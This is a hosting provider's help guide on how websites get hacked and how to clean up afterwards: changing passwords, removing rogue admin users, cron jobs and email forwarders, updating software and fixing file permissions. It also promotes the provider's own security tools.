How to Recover from a Website Hack (And Prevent Another One)

Getting hacked is stressful, but it is not the end of the world - most sites can be recovered quickly with the right steps. This guide explains what likely happened, walks you through the cleanup, and shows you how to stop it happening again.

Step one: breathe

At Kualo, we have built a multi-layered security system to keep your site safe - firewalls that make split-second calls on threats, malware scanners that never sleep, real-time exploit blocking, and automated patching that shuts down thousands of vulnerabilities every day. We enforce strong passwords, flag risky plugins, and stop millions of attacks before they get close.

But security is a shared effort. We handle the heavy lifting - fighting off attackers, keeping our servers secure, giving you all the tools to stay protected. No matter how strong the castle walls are, though, if someone inside opens a window, a hacker has an opportunity to slip in.

How did this happen?

You might be thinking: "If all these security measures are in place, how is a hack even possible?"

The short answer: it almost certainly was not a failure in our server-side security.

The vast majority of website breaches happen because of something inside the account itself. A password leaked in a data breach, an outdated plugin containing a vulnerability, a phishing email that tricked someone into handing over login details - these are the most common entry points.

It is like defending a castle from thousands of incoming arrows. We block most of them, but if just one gets through - because a door was left open (a vulnerability) or a guard was tricked into letting someone in (a stolen password) - that is all it takes.

We can stop brute-force attacks and botnets, and defend against many known exploits. But we cannot patch a password that is already exposed or a plugin that has not been updated in three years and has a gaping security hole. That is why keeping your passwords secure, your software updated, and 2FA enabled is absolutely critical.

Here are the most common ways hackers get in - and how to stop them.

1. Compromised credentials

• Using weak or reused passwords.
• Storing passwords in emails or unsecured documents.
• Password theft via malware on your device.

Our systems enforce strong password policies - both cPanel and MyKualo require secure passwords, and for WordPress and some other CMS platforms we detect and block weak or compromised passwords at login, and block brute-force attempts.

The most common way credentials get compromised, though, is not because someone guessed your password - it is because they already have it. Maybe it was leaked in a data breach, maybe a phishing email tricked you into handing it over, or maybe malware on your device silently stole it.

To stay ahead: always use unique passwords for each service (a password manager helps enormously), enable Two-Factor Authentication (2FA), and never enter your credentials into a site you did not explicitly navigate to.

You can check whether your email or password has appeared in a known data breach at Have I Been Pwned.

2. Unpatched software and plugins

• Running outdated WordPress, Joomla, or other CMS platforms.
• Vulnerable plugins or themes that have not been updated.
• Plugins that are abandoned (no longer receive updates) but are still installed.

A vulnerability is like a crack in your site's armour - hackers are constantly scanning for these cracks. The vast majority of website hacks happen because of known vulnerabilities in outdated software.

At Kualo, we tackle this with Patchman, which automatically detects and patches vulnerabilities in common CMS applications like WordPress, Joomla, and Drupal. These patches are backported, meaning you get essential security fixes without needing to jump to a major new version that could break your site. WP Toolkit helps automate updates using Smart Updates, so you can test changes safely before applying them live.

Not everything can be patched automatically, though. Some plugins and themes are abandoned by their developers, leaving security flaws permanently exposed. For WordPress users, WP Toolkit scans installations for vulnerabilities, even in seemingly up-to-date plugins that are no longer maintained. Softaculous also detects outdated applications across different CMSs and provides easy upgrade options.

Security starts with vulnerability-free software. No security system is invincible if the code itself is inherently vulnerable.

3. Backdoors and persistent malware

• Hackers may create unauthorised CMS admin users.
• Malicious cron jobs and scripts can reinfect your site even after cleanup.
• Database injections can add hidden admin accounts or malicious redirects.

Once a hacker gets inside, they rarely just walk away - they leave behind secret tunnels, hidden keys, and open windows so they can return whenever they like. Cleaning up visible malware is not enough; you need to hunt down and eliminate any backdoors too.

Hackers commonly add unauthorised admin users, create malicious cron jobs, or hide scripts deep in your site files to keep their access alive. Regularly auditing admin users, checking cron jobs, and running WP Toolkit's integrity checker can help you spot and remove these hidden threats.

If you are ever unsure, restoring your site to a clean state from before the compromise is a reliable way to remove hidden threats - but make sure you fix the original vulnerability first. Otherwise you are just rolling out a welcome mat for the attacker to come right back in.

4. Compromised email account

• If an attacker accesses your email, they can reset your hosting or CMS password.
• Check for suspicious email forwarding rules.

Your email account is a treasure trove - password resets, account verification links, and communication history all live there. If an attacker gains access, they can reset your hosting or CMS password and use your email to infiltrate other services. Never store passwords in plain-text emails, as compromised email accounts are a leading cause of security breaches.

Enable Two-Factor Authentication (2FA) on all your accounts - including MyKualo and cPanel - to add an extra layer of security. Regularly check for unauthorised email forwarders in cPanel to ensure no one is secretly redirecting your emails. If your email has been compromised, assume all linked accounts could also be at risk and change passwords immediately.

---

Immediate action: what to do right now

Now you know how hackers sneak in - bad passwords, outdated plugins, backdoors, the usual horror show. Knowing how they got in does not fix the fact that they are currently inside your house, probably rearranging your furniture. Here is your action plan to kick them out and change the locks.

Step 1: scan your local computer for malware

• If your device is infected, changing passwords will not help.
• Run a full scan with reputable antivirus software.

Hackers often use keyloggers and other stealthy malware to steal credentials the moment you type them, so even the strongest password will not help if your device is already compromised. Before changing any passwords, run a full malware scan with a trusted security tool. Consider running an anti-malware scanner alongside your antivirus to catch more advanced threats.

Whether you are on Windows, macOS, or Linux, you should always have a trusted antivirus program installed and running regular scans. Macs can and do get malware - that is a myth worth busting.

Step 2: change all passwords

• Update passwords for cPanel, FTP, databases, your CMS (WordPress, Joomla, Magento, etc.), and email accounts.
• Use strong, unique passwords everywhere - no repeats, no easy guesses.
• Never store passwords in plain text (emails, notes, or sticky notes are not secure storage).
• Enable 2FA wherever possible.

If just one of your passwords is compromised, hackers will try it everywhere - your hosting, email, database, even your social accounts. Here is what to update.

cPanel / hosting control panel

Your cPanel password controls everything - file access, databases, email accounts, cron jobs, and more. Change this first and set up 2FA at the same time.

FTP accounts

A compromised FTP account lets attackers modify your site without needing CMS access. Check for any unknown FTP accounts under cPanel > FTP Accounts and reset all passwords.

Database passwords

Your database contains all your content, user accounts, and critical site data. If an attacker had access, they could still manipulate your site even after you clean up everything else.

For WordPress:

1. Open wp-config.php in File Manager or via FTP.
2. Find the line: define( 'DB_PASSWORD', 'yourpassword' );
3. Replace the password with a new strong one.
4. Update the database user password in cPanel > MySQL Databases to match.

For Joomla, Magento, or other CMSs, look for a configuration file (configuration.php, env.php, or settings.php) where database credentials are stored and update accordingly.

CMS admin passwords (WordPress, Joomla, Magento, etc.)

Your CMS is usually the first thing a hacker targets. Reset all admin-level passwords and review user accounts for suspicious new admins - attackers often create backdoor users. In WordPress, go to Users > All Users and remove any unknown admins.

Email accounts

Change all email passwords in cPanel > Email Accounts, particularly if you suspect the hacker gained access to your hosting account as a whole.

Third-party services (domain registrars, payment providers, CRMs, etc.)

Reset passwords for any external services too. A compromised registrar account could allow an attacker to transfer your domain away - which is a nightmare scenario.

Keeping passwords secure going forward

• Use a password manager such as Bitwarden, 1Password, or LastPass to generate and store unique passwords.
• Never reuse passwords across multiple services.
• Enable 2FA wherever possible, especially for email, cPanel, and CMS logins.
• Regularly audit your admin and FTP accounts to remove old or unused access.

Step 3: restore a clean backup (if needed)

Restoring from a backup can be the fastest way to recover from a hack, but it is worth deciding whether it is the right approach before you proceed.

When a backup is the best option:

• The attack happened recently and you have a known clean backup from before the compromise.
• Your site has not changed significantly since the last backup - this matters especially for eCommerce stores, forums, or membership sites where restoring could overwrite orders, signups, or content.
• You would rather restore than manually clean files (as long as you fix the original vulnerability afterwards).

When to be cautious about restoring:

• The hack may have been present for a while, meaning older backups could still contain the compromise.
• You have made significant content updates, transactions, or changes that would be lost if you roll back.
• You are unsure when the hack occurred and need to investigate further before restoring.

How to decide

1. Check file modification timestamps - in cPanel > File Manager, sort files by Last Modified to identify when changes were made. If many files were altered around the same time, that could be the moment of compromise.
2. Review access and malware logs - if you have Imunify360 in cPanel, check its logs for malware detections and timestamps. Also look at cPanel access logs for unknown logins.
3. Determine the best restore option - you can restore just the site files while keeping the database intact, or restore the database separately if you have a clean snapshot. If you are unsure, our team can help you work out the best approach.

If you are unsure when the hack occurred, open a support ticket and we can help you analyse the timeline.

Step 4: review and remove suspicious admin users

• Check for unauthorised admin users in your CMS (WordPress, Joomla, Magento, or other platforms).
• Remove any unknown accounts with elevated privileges.
• If you are locked out, access the database via phpMyAdmin to check and remove rogue users - we can help you regain access if needed.

One of the first things attackers do after breaching a site is create a backdoor admin account so they can return even after you have cleaned up. If you spot an unfamiliar admin user, delete them immediately.

If you are locked out of your CMS, access can usually be regained via Softaculous or WP Toolkit, or contact us and we can help via other means.

Step 5: scan and remove malicious code

• Use Imunify360 in cPanel to scan for and remove malware automatically.
• Manually check for unknown or suspicious files in public_html and other critical directories.

Imunify360 is constantly on guard, automatically scanning and removing threats - but no malware scanner is 100% foolproof, which is why a manual check is still worth your time.

Open cPanel's File Manager, sort files by last modified date, and actually open any unexpected files to see what is inside. If a file named wp-config-extra.php suddenly appeared at 2:13 AM on a Tuesday and you do not remember creating it, it is probably not your friend.

Imunify360 is included with all Kualo shared hosting plans. If you are running your own server, you may have ImunifyAV instead, which does not offer real-time scanning - so running a full manual scan is essential. See our introduction to Imunify360 for more detail.

For WordPress users, use WP Toolkit to verify the integrity of core files - it can tell you if any system files have been tampered with and restore them with a single click. Follow that up with a manual sweep of your public_html folder, looking for strange filenames, unexpected scripts, or anything lurking in directories that should not be there.

Step 6: review cron jobs in cPanel

• Go to cPanel > Cron Jobs and look for anything suspicious.

Cron jobs are your website's automated to-do list - normally used for useful things like clearing cache, running backups, or sending emails. If a hacker gets in, they can weaponise cron jobs to keep their attack running indefinitely.

A malicious cron job can remotely download and execute malware without even writing a file to your server. That means even if you wipe your site clean, the infection could come straight back. Imunify360's Proactive Defence helps by blocking suspicious PHP executions in real time, but it is best to be certain by removing anything that should not be there.

Look closely at your cron jobs in cPanel. If you see a command you do not recognise - especially anything fetching files from a remote server using wget, curl, or pointing to an unfamiliar URL - that is a serious red flag. Disable it immediately and investigate, or reach out to us.

Step 7: update everything

• Update all your software - core, plugins, themes, and PHP version where compatible.
• If you are using WordPress, use WP Toolkit's vulnerability scanner to detect risky plugins.

Running outdated code is like leaving your front door unlocked with a sign that says "welcome, hackers". The majority of website compromises happen not because of some genius attacker, but because of unpatched vulnerabilities that attackers already know how to exploit.

For WordPress users, start with WP Toolkit's vulnerability scanner - it flags plugins and themes with known security issues. Prioritise anything marked as vulnerable. If a plugin is vulnerable but has no available update, it may have been abandoned by its developer and you will need a secure alternative.

On PHP versions: updating PHP matters for both performance and security, but we know some sites rely on older versions for compatibility. We run hardened PHP, meaning even older versions are protected from many vulnerabilities even if they are no longer in mainstream support. That said, outdated application code can still be a risk - if you need an old PHP version to keep your site running, it is probably time to update your site's code as well.

If you are worried about updates breaking things, WP Toolkit's Smart Updates lets you test updates in a safe environment before applying them live, and can be set to run automatically. For non-WordPress sites, you can clone your site or use staging in Softaculous to test major updates before touching your live site.

Step 8: check email forwarding and filters

• In cPanel > Email Filters, remove any unauthorised forwarding rules.

Your email account can be the master key to everything. If an attacker gains access, they can reset passwords and take over accounts - and they do not even need full access to cause damage. They just need to quietly forward your emails somewhere else.

A common attacker trick is setting up forwarding rules that send copies of incoming emails (including password reset links) to their own inbox, letting them watch and wait for an opportunity. Since this does not require ongoing full access, you might not notice it is happening.

Go to cPanel > Email Filters and look for any forwarding rules you do not remember setting up. If you see a rule forwarding to an unknown external address, delete it immediately. Even if nothing looks suspicious, reviewing these settings regularly is a good habit.

Step 9: review file and folder permissions

• Files should be 644, folders 755.
• Do not set files to 777 (full permissions).

Think of file permissions like the security settings on your house. 644 means only the owner can modify a file. 755 means folders can be read and accessed but not changed by just anyone. 777 is like leaving your front door wide open and taping a spare key to the letterbox.

Hackers love overly permissive file settings because they allow malicious scripts to be uploaded, existing files to be modified, or your site to be wiped entirely. Some older guides or plugins may suggest setting files to 777 to "fix" permission issues - do not do it. Review your file and folder permissions in cPanel > File Manager or via SSH to ensure everything is locked down properly.

For WordPress users, WP Toolkit's Security Measures can automatically fix incorrect file permissions and apply other security hardening measures.

---

Keeping your site secure going forward

Recovering from a hack is not fun, but you can prevent it from happening again - and it is easier than you might think.

If you take away just three things from this guide, make them these:

• Keep everything updated - your CMS, plugins, themes, and PHP where possible.
• Use strong, unique passwords for every service - reusing passwords is like using the same key for your house, car, and office. If one gets stolen, everything is at risk.
• Enable 2FA - this shuts down most password-based attacks before they even start.

With those in place - plus our firewall protection, malware scanning, and proactive security layers - your site will be about as hacker-proof as it gets. Could someone still break in? Sadly, there are never any guarantees, but hackers look for low-hanging fruit, and your site will not be it.

One more thing worth knowing: how your hosting is structured matters. If you have multiple sites inside one cPanel account using addon domains, a breach in one can spread to the others. Keeping applications separate, updated, and isolated makes life much harder for attackers.

And if something still seems off - we have got your back. If you ever suspect a security issue, need help investigating unusual activity, or want a second opinion before making changes, our support team is here.

Security is not about being invincible - it is about making your site so annoying to hack that attackers give up and move on. Do the basics, use the tools we provide, and your site will be one of the hardest targets around.